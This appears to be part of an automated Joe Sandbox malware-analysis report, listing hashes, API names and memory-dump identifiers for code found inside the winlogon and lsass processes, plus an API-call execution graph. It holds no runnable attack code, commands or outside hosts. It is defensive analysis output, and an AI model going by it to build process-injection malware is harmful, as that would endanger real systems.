                                  • Instruction ID: f8e56e85a1f2e39073d9e83f186f58b2302478e1041c027c43740ac194b6c2ad
                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction Fuzzy Hash: C461B432505BC582E7718F16E4447EAB7A0F795B84F09461AEB9807B9ACB7CC1D1CF10
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: FileType
                                  • String ID: \\.\pipe\
                                  • API String ID: 3081899298-91387939
                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                  • Instruction ID: d918924d4c1c19119e08a41976e186f77b7864b5d209edd595c7a3a9f4120da3
                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                  • Instruction Fuzzy Hash: 4951E4262887C2C1E664DE27E45C3AA6791F395B90F46042FCE5953B9BDF3AC484CF60
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: FileType
                                  • String ID: \\.\pipe\
                                  • API String ID: 3081899298-91387939
                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                  • Instruction ID: 5d217bf6d04f4f2066cf48567ba22e057cf07466d433004b53ba3f4c68097da3
                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                  • Instruction Fuzzy Hash: 6B51E6262847C241F664AE2BE4DC3AA6791F394791F56006FCE5943B9BDB39C484CF60
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: ErrorFileLastWrite
                                  • String ID: U
                                  • API String ID: 442123175-4171548499
                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                  • Instruction ID: 411349593ad3cc96e962f803b67d12bb301d5a2377b26e2f818162615971cb44
                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                  • Instruction Fuzzy Hash: C541E332625AC186E750CF26E40879AB7A4F3487C4F81412AEE4DC7759EB3CC481CB61
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: ErrorFileLastWrite
                                  • String ID: U
                                  • API String ID: 442123175-4171548499
                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                  • Instruction ID: 86bbfcbc3b2bc522ed27744e2597a353c96b3a7408215917faee95bbd1c0df2c
                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                  • Instruction Fuzzy Hash: EF41F532625AC186E750DF26E44879AB7A0F348785F91012BEE4D87759EB38C485CF60
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: ExceptionFileHeaderRaise
                                  • String ID: csm
                                  • API String ID: 2573137834-1018135373
                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                  • Instruction ID: 9080afa95f7a01804f2c244821efc419be84dbf608daa87a986a050390325844
                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                  • Instruction Fuzzy Hash: E9110D32214B8182EB618F16F448259B7E5F788B94F594229EE8D47B65DF3CC591CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: ExceptionFileHeaderRaise
                                  • String ID: csm
                                  • API String ID: 2573137834-1018135373
                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                  • Instruction ID: 62455cb78399d41422b4bacb2f9664d4c26165a867511ae89ef3ea99247706da
                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                  • Instruction Fuzzy Hash: 4D113D32618B8182EB618F16F448259B7E5F788B98F59426AEF8D07B65DF3CC591CB00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocFree
                                  • String ID:
                                  • API String ID: 756756679-0
                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                  • Instruction ID: dc5e75dbea597644e58d0757a472dac44218e342a11f0de7a17252c2a716ed97
                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                  • Instruction Fuzzy Hash: 2B11C421601BC1D1EA14DB67E40C15977B0F788FC0F5A4029DE4E93726DF38C882CB00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocFree
                                  • String ID:
                                  • API String ID: 756756679-0
                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                  • Instruction ID: 4d2323ec3713bd9932b13aeac9ebc90c1c6d9f8db30a864723114dd424604e59
                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                  • Instruction Fuzzy Hash: A411A921A41BD195EA14DF6BE80825967A0FB88FC0F5A402BDF4E53726EF38C4828710
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcess
                                  • String ID:
                                  • API String ID: 1617791916-0
                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                  • Instruction ID: eeef85041e22312c8f4b148aac9b2b62df894d1324cff35107f827dd3875fbf4
                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                  • Instruction Fuzzy Hash: 83E06D31642645DBE7188F63D80C34936E1FB88F85F46C028C90947351EF7D84D9AB62
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcess
                                  • String ID:
                                  • API String ID: 1617791916-0
                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                  • Instruction ID: ed50ef3ab0d71e7b70b719e84647f1633c4beadf3879e154f4f50509bcdd7906
                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                  • Instruction Fuzzy Hash: ABE06DB16816559AE7148F63D80C34936E1FB88F06F46C02ACA0D07361EF7D84DD8B61
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcess
                                  • String ID:
                                  • API String ID: 1617791916-0
                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                  • Instruction ID: 825a6694882a2f2e0203d72e77b5f1ea4254fdb28cd6073bd6bf03f3f975e28d
                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                  • Instruction Fuzzy Hash: D0E0ED71651545DBE7189B63D80C25976A1FB88B95F458029C90947311EE3884D9AA22
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcess
                                  • String ID:
                                  • API String ID: 1617791916-0
                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                  • Instruction ID: 5d14700ce6ee7fd00fcfe9e45fa676b48a0b3ebec7350ef0adf203bd686aa6d2
                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                  • Instruction Fuzzy Hash: 41E012B16915559BE7189F63DC0835976E1FB8CF16F45802ACA0D07321EE3C84DDDB21
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000002A.00000003.2213833034.00000213BDCB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_42_3_213bdcb0000_lsass.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                  • Instruction ID: 61f1d2de62c5d050c97ccebb5350ada11d9d53b3d6a2641a44b1299cf3e9cc89
                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                  • Instruction Fuzzy Hash: 00915972B4599887DF50CF29D4087BDB396FB65B9CF548124DE4907788EA3ADB02C700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002A.00000003.2213833034.00000213BDCB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_42_3_213bdcb0000_lsass.jbxd
                                  Similarity
                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 849930591-393685449
                                  • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                  • Instruction ID: db7b30c39e305e646b868ad5804bbc310faef19f5b9f9d70d26688d1a4736ed1
                                  • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                  • Instruction Fuzzy Hash: A4D16C32648B488AEF64DF6594883ED77A2F76978CF100115EE8957B96EF36C781C700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000002A.00000003.2213833034.00000213BDCB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_42_3_213bdcb0000_lsass.jbxd
                                  Similarity
                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                  • String ID:
                                  • API String ID: 190073905-0
                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction ID: d345d5324271f0d5171215dfa4b54c6fe05ce528af9bdb7db641f34e8b49a6e5
                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction Fuzzy Hash: 3E81013068D34986FE50DB65984D3D922D3ABB6B8CF389015AE48473D2FA3BCB46C740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002A.00000003.2213833034.00000213BDCB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_42_3_213bdcb0000_lsass.jbxd
                                  Similarity
                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 3896166516-3733052814
                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction ID: b803740eefc1816f598c49eeb7ad399cfc473af26448cda9b3f93a838d602e89
                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction Fuzzy Hash: 7B51C3322883488AEF74CF51E1483987BA2F764B9CF144115EACA87BD5EB7AC751CB05
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002A.00000003.2213833034.00000213BDCB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_42_3_213bdcb0000_lsass.jbxd
                                  Similarity
                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 3242871069-1018135373
                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction ID: 663fbd93b9f828301bf8f4d0b442a81fa75e355fdce2156b5b3a9770e516cb1a
                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction Fuzzy Hash: 9C51B33235AA048AEF58CF15E448BAC7393EB68B9CF558125DA4647788FB7ACB41C704
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002A.00000003.2213833034.00000213BDCB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_42_3_213bdcb0000_lsass.jbxd
                                  Similarity
                                  • API ID: CallTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3163161869-2084237596
                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction ID: 2ab862f2f725d330804ea44e526bf848b6203aed6b1205d3f9e1bbeff4f211bd
                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction Fuzzy Hash: 4C619132508BC882DB75DF25E4447DAB7A1F7A9B8CF044215EB9817B99EF79D290CB00

                                  Execution Graph

                                  Execution Coverage:1.5%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:1410
                                  Total number of Limit Nodes:5
                                  execution_graph 9118 158709d5974 9119 158709d597a 9118->9119 9130 158709d7fa0 9119->9130 9124 158709d5a77 9126 158709d5bfd 9124->9126 9128 158709d59de 9124->9128 9143 158709d7b80 9124->9143 9125 158709d5cfb 9126->9125 9127 158709d5d77 VirtualProtect 9126->9127 9127->9128 9129 158709d5da3 GetLastError 9127->9129 9129->9128 9133 158709d7fab 9130->9133 9131 158709d59bd 9131->9128 9139 158709d4400 9131->9139 9132 158709db470 _invalid_parameter_noinfo 2 API calls 9132->9133 9133->9131 9133->9132 9134 158709d7fca 9133->9134 9135 158709d7fd5 9134->9135 9149 158709d87b8 9134->9149 9153 158709d87d8 9135->9153 9140 158709d441d 9139->9140 9142 158709d448c 9140->9142 9157 158709d4670 9140->9157 9142->9124 9144 158709d7bc7 9143->9144 9182 158709d7950 9144->9182 9147 158709d8070 _invalid_parameter_noinfo 8 API calls 9148 158709d7bf1 9147->9148 9148->9124 9150 158709d87c6 std::bad_alloc::bad_alloc 9149->9150 9151 158709d9178 Concurrency::cancel_current_task 2 API calls 9150->9151 9152 158709d87d7 9151->9152 9154 158709d87e6 std::bad_alloc::bad_alloc 9153->9154 9155 158709d9178 Concurrency::cancel_current_task 2 API calls 9154->9155 9156 158709d7fdb 9155->9156 9158 158709d4694 9157->9158 9162 158709d46b7 9157->9162 9158->9162 9171 158709d4120 9158->9171 9160 158709d4753 9165 158709d476f 9160->9165 9168 158709d4120 3 API calls 9160->9168 9161 158709d471d 9161->9160 9167 158709d4120 3 API calls 9161->9167 9166 158709d46ed 9162->9166 9177 158709d4250 9162->9177 9164 158709d4250 2 API calls 9164->9161 9169 158709d478b 9165->9169 9170 158709d4250 2 API calls 9165->9170 9166->9161 9166->9164 9167->9160 9168->9165 9169->9142 9170->9169 9172 158709d4141 9171->9172 9173 158709d41b0 9172->9173 9174 158709d4196 VirtualQuery 9172->9174 9175 158709d41ca VirtualAlloc 9172->9175 9173->9162 9174->9172 9174->9173 9175->9173 9176 158709d41fb GetLastError 9175->9176 9176->9172 9176->9173 9181 158709d4268 9177->9181 9178 158709d42d7 9178->9166 9179 158709d42bd VirtualQuery 9179->9178 9179->9181 9180 158709d4322 GetLastError 9180->9181 9181->9178 9181->9179 9181->9180 9183 158709d796b 9182->9183 9184 158709d7981 SetLastError 9183->9184 9185 158709d798f 9183->9185 9184->9185 9185->9147 7562 158709e46f5 7571 158709d9324 7562->7571 7564 158709e470d 7565 158709d9324 __CxxCallCatchBlock 9 API calls 7564->7565 7566 158709e4728 7565->7566 7567 158709d9324 __CxxCallCatchBlock 9 API calls 7566->7567 7568 158709e473c 7567->7568 7569 158709d9324 __CxxCallCatchBlock 9 API calls 7568->7569 7570 158709e477e 7569->7570 7574 158709d9340 7571->7574 7573 158709d932d 7573->7564 7575 158709d935f GetLastError 7574->7575 7576 158709d9358 7574->7576 7586 158709d9c8c 7575->7586 7576->7573 7590 158709d9aac 7586->7590 7591 158709d9b96 TlsGetValue 7590->7591 7597 158709d9af0 __vcrt_FlsAlloc 7590->7597 7592 158709d9b1e LoadLibraryExW 7594 158709d9bbd 7592->7594 7595 158709d9b3f GetLastError 7592->7595 7593 158709d9bdd GetProcAddress 7593->7591 7594->7593 7596 158709d9bd4 FreeLibrary 7594->7596 7595->7597 7596->7593 7597->7591 7597->7592 7597->7593 7598 158709d9b61 LoadLibraryExW 7597->7598 7598->7594 7598->7597 8809 158709d2ff0 8810 158709d3061 8809->8810 8811 158709d3384 8810->8811 8812 158709d308d GetModuleHandleA 8810->8812 8813 158709d30b1 8812->8813 8814 158709d309f GetProcAddress 8812->8814 8813->8811 8815 158709d30d8 StrCmpNIW 8813->8815 8814->8813 8815->8811 8819 158709d30fd 8815->8819 8816 158709d1a30 6 API calls 8816->8819 8817 158709d32b9 lstrlenW 8817->8819 8818 158709d320f lstrlenW 8818->8819 8819->8811 8819->8816 8819->8817 8819->8818 8820 158709d1cfc StrCmpIW StrCmpW 8819->8820 8821 158709d3f88 StrCmpNIW 8819->8821 8820->8819 8821->8819 8231 158709df870 8232 158709df8a0 8231->8232 8234 158709df8c7 8231->8234 8233 158709dcb10 __std_exception_copy 13 API calls 8232->8233 8232->8234 8238 158709df8b4 8232->8238 8233->8238 8235 158709df99c 8234->8235 8254 158709dc558 EnterCriticalSection 8234->8254 8239 158709dfab3 8235->8239 8241 158709dfa03 8235->8241 8247 158709df9ca 8235->8247 8236 158709df904 8238->8234 8238->8236 8240 158709df949 8238->8240 8242 158709dfac0 8239->8242 8256 158709dc5ac LeaveCriticalSection 8239->8256 8243 158709dd1f4 __std_exception_copy 13 API calls 8240->8243 8252 158709dfa61 8241->8252 8255 158709dc5ac LeaveCriticalSection 8241->8255 8246 158709df94e 8243->8246 8249 158709dd04c _invalid_parameter_noinfo 38 API calls 8246->8249 8247->8241 8250 158709dcab0 _invalid_parameter_noinfo 14 API calls 8247->8250 8248 158709dcab0 14 API calls _invalid_parameter_noinfo 8248->8252 8249->8236 8251 158709df9f3 8250->8251 8253 158709dcab0 _invalid_parameter_noinfo 14 API calls 8251->8253 8252->8248 8253->8241 9186 158709df370 VirtualProtect 8257 158709d8672 8258 158709d90c0 __std_exception_copy 38 API calls 8257->8258 8259 158709d869d 8258->8259 7599 158709dacec 7602 158709d90c0 7599->7602 7601 158709dad15 7603 158709d90e1 7602->7603 7604 158709d9116 7602->7604 7603->7604 7606 158709dc328 7603->7606 7604->7601 7607 158709dc335 7606->7607 7608 158709dc33f 7606->7608 7607->7608 7613 158709dc35a 7607->7613 7615 158709dd1f4 7608->7615 7610 158709dc346 7618 158709dd04c 7610->7618 7612 158709dc352 7612->7604 7613->7612 7614 158709dd1f4 __std_exception_copy 13 API calls 7613->7614 7614->7610 7621 158709dcb10 7615->7621 7689 158709dcef8 7618->7689 7622 158709dcb59 GetLastError 7621->7622 7624 158709dcb2f __std_exception_copy 7621->7624 7623 158709dcb6c 7622->7623 7626 158709dcb8a SetLastError 7623->7626 7627 158709dcb87 7623->7627 7629 158709dc940 _invalid_parameter_noinfo 11 API calls 7623->7629 7625 158709dcb54 7624->7625 7630 158709dc940 GetLastError 7624->7630 7625->7610 7626->7625 7627->7626 7629->7627 7631 158709dc966 7630->7631 7632 158709dc96c SetLastError 7631->7632 7648 158709dd220 7631->7648 7633 158709dc9e5 7632->7633 7633->7625 7636 158709dc9a5 FlsSetValue 7638 158709dc9b1 FlsSetValue 7636->7638 7639 158709dc9c8 7636->7639 7637 158709dc995 FlsSetValue 7655 158709dd2a0 7637->7655 7641 158709dd2a0 __free_lconv_num 7 API calls 7638->7641 7661 158709dc758 